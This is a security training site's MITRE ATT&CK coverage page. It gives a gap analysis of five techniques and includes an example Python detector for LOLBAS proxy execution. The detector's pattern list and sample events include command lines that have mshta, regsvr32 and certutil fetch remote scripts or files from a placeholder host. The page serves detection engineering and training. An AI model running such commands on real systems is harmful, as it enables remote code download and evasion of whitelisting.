
ATT&CK Coverage Navigator

This page provides an interactive heatmap of Nexus SecOps content mapped to the MITRE ATT&CK Enterprise framework. Each cell represents a technique under one of the 14 tactics. Color coding shows coverage depth: whether a technique has detection queries, labs, and exercises (green), chapter content only (yellow), or remains a gap (red).

Use this navigator to identify where your detection engineering and training investments are strongest, and where gaps remain. Click any technique cell to see exactly which Nexus content covers it.

Coverage legend:
Full — Detection query + lab/exercise
Partial — Chapter content only
Gap — Not yet covered

Gap Analysis — Top Priority Techniques

The following techniques represent the most impactful coverage gaps based on real-world threat intelligence and prevalence data. These are prioritized for future content development.

1. T1218 — System Binary Proxy Execution (Defense Evasion)

Priority: Critical | Living-off-the-land binaries (LOLBAS) are used in nearly every sophisticated intrusion. Attackers use trusted Windows binaries like mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe to proxy execution and bypass application whitelisting.

Remediation plan: Add KQL/SPL detection queries for top 10 LOLBAS binaries, create a Sigma rule set, and develop a purple team exercise.
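As an added illustration of the kind of detection logic this plan calls for (example code written for this page, not Nexus SecOps content or its query set): a small Python classifier run over constructed process-creation events for the four binaries named above. The per-binary command-line indicators are assumptions modelled on common public Sigma-style rules, and the sample events are constructed.

```python
"""Toy T1218 (System Binary Proxy Execution) detector over constructed
process-creation events. Added example; not Nexus SecOps detection content."""
import re
from dataclasses import dataclass

# Per-binary command-line indicators (assumed, modelled on common public
# Sigma-style rules). The binary names are the ones the gap analysis cites.
LOLBAS_INDICATORS = {
    "mshta.exe": [r"https?://", r"vbscript:", r"javascript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:", r"https?://"],
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
}

@dataclass
class ProcessEvent:
    image: str         # full path of the created process (Sysmon EID 1 / 4688)
    command_line: str  # command line as logged

def classify(event: ProcessEvent):
    """Return (binary, matched_pattern) when the event looks like LOLBAS
    proxy execution, else None. Command-line matching is case-insensitive."""
    binary = event.image.rsplit("\\", 1)[-1].lower()
    patterns = LOLBAS_INDICATORS.get(binary)
    if not patterns:
        return None  # not one of the watched binaries
    for pat in patterns:
        if re.search(pat, event.command_line, re.IGNORECASE):
            return binary, pat
    return None

# Constructed sample events: the first two are benign, the rest should fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "certutil -verify cert.cer"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/p.hta"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", "regsvr32 /i:http://example.invalid/x.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "certutil -urlcache -f http://example.invalid/a a"),
]

def run_detection(events):
    """Return a list of (binary, matched pattern) for every flagged event."""
    return [hit for hit in (classify(e) for e in events) if hit]

if __name__ == "__main__":
    for binary, pat in run_detection(SAMPLE_EVENTS):
        print(f"ALERT T1218: {binary} command line matched {pat!r}")
```

In production the same indicator table would be expressed as KQL/SPL or Sigma selections keyed on the process-creation event source, with allowlisting of known administrative command lines to control false positives.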

2. T1593 — Search Open Websites/Domains (Reconnaissance)

Priority: High | Adversaries routinely harvest information from job postings, social media, DNS records, and paste sites before targeting an organization. While difficult to detect, awareness and exposure reduction are critical.

Remediation plan: Expand Ch42 (OSINT Advanced) with a defensive OSINT section covering digital footprint reduction and monitoring services.

3. T1585 — Establish Accounts (Resource Development)

Priority: High | Threat actors create disposable email, social media, and service accounts to support phishing campaigns and social engineering. Detection focuses on identifying impersonation accounts and suspicious registration patterns.

Remediation plan: Add content to Ch49 (Threat Intelligence Ops) covering adversary infrastructure tracking and takedown procedures.

4. T1563 — Remote Service Session Hijacking (Lateral Movement)

Priority: Medium | RDP and SSH session hijacking allows lateral movement without generating new authentication events, making it particularly stealthy. Detection requires monitoring for session enumeration and session switching commands.

Remediation plan: Add detection queries targeting tscon.exe usage and SSH multiplexing anomalies. Include in Lab 06 (AD Attack Paths) as an advanced exercise.

5. T1115 — Clipboard Data (Collection)

Priority: Medium | Clipboard monitoring malware captures passwords, cryptocurrency addresses, and sensitive data copied by users. This technique often supports credential theft and financial fraud operations.

Remediation plan: Create Sigma rules for clipboard access API calls and develop a micro-simulation demonstrating clipboard-based credential theft.

Contributing

Want to help close these gaps? See the Contributing Guide for how to submit detection queries, lab exercises, and chapter content mapped to ATT&CK techniques.